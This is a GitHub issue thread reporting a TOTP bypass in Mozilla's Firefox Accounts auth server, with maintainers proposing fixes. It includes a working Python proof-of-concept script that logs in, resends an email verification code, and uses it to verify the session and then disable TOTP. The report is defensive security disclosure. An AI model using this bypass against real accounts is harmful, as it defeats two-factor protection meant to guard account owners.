### ISSUE TITLE
TOTP can be bypassed by triggering an email confirmation loop

### ISSUE THREAD

**Issue by rfk** [mozilla/fxa-auth-server#2351]
(I'm not filing this as a security bug because the feature isn't live in production yet)

It's possible to bypass and disable TOTP by manually triggering an email confirmation loop.

The code in `/account/login` forces `verificationMethod=totp-2fa` when signing in to an account with TOTP enabled:

  https://github.com/mozilla/fxa-auth-server/blob/master/lib/routes/account.js#L514

However it doesn't look like this verificationMethod is persisted anywhere, so there's nothing on the sessionToken that prevents it from being verified by some other method, such as an email loop.

Here's a PyFxA script that shows the behaviour:

```
import getpass
import fxa.core

host = raw_input("Enter FxA deploy [https://latest.dev.lcip.org/]: ") or "https://latest.dev.lcip.org/"
if not host.endswith("/"):
    host += "/"
c = fxa.core.Client(host + "auth/v1")

email = raw_input("Enter an account with TOTP enabled: ")
password = getpass.getpass()

print "Logging in..."
s = c.login(email, password)

status = s.get_email_status()
print status
assert not status["sessionVerified"]
print "The session is unverified, as it should be."

print "Triggering a verification email..."
s.resend_email_code()

code = raw_input("Extract the 'code' parameter from the link in your email, and enter it here: ")
s.verify_email_code(code)

status = s.get_email_status()
print status
if status['sessionVerified']:
    print "The session is now verified."
    print "We appear to have bypassed TOTP verification :-("
else:
    print "The session is still unverified."
    print "Good news, we didn't bypass TOTP verification :-)"
```

This script does a login, triggers a "resend" of the verification email in order to get the verification code sent over email, then uses that code to verify the session rather than TOTP.

Using this trick, I was able to bypass TOTP on one of my own accounts, get into the settings page with the verified sessionToken, and disable TOTP on the account.

I think there are two related issues here:

* Since I had TOTP enabled on my account, I should not have been able to verify a sessionToken via email loop.  I'm not sure what the right behaviour is - maybe error our instead of sending the verification email?
* ISTM that I should not have been able to disable TOTP using a session that wasn't TOTP-verified, regardless of where it came from.  For example, if I have an old email-verified session lying around from before I enabled TOTP on my account, it shouldn't be possible to use that session to disable TOTP.

**Comment by vbudhram** [comment]
Nice find! The resend code endpoint current can resend codes for account verification, secondary email verification and sign-in confirmation. We should probably only error on resending sign-in confirmation codes.

The delete TOTP endpoint should be updated to check the session verification method and ensure that it is `totp-2fa`.

**Comment by rfk** [comment]
> The delete TOTP endpoint should be updated to check the session verification method and ensure
> that it is totp-2fa.

Or alternately, that the assurance level is >= 2, which would be forward-compatible with a future where multiple 2FA mechanisms are supported.
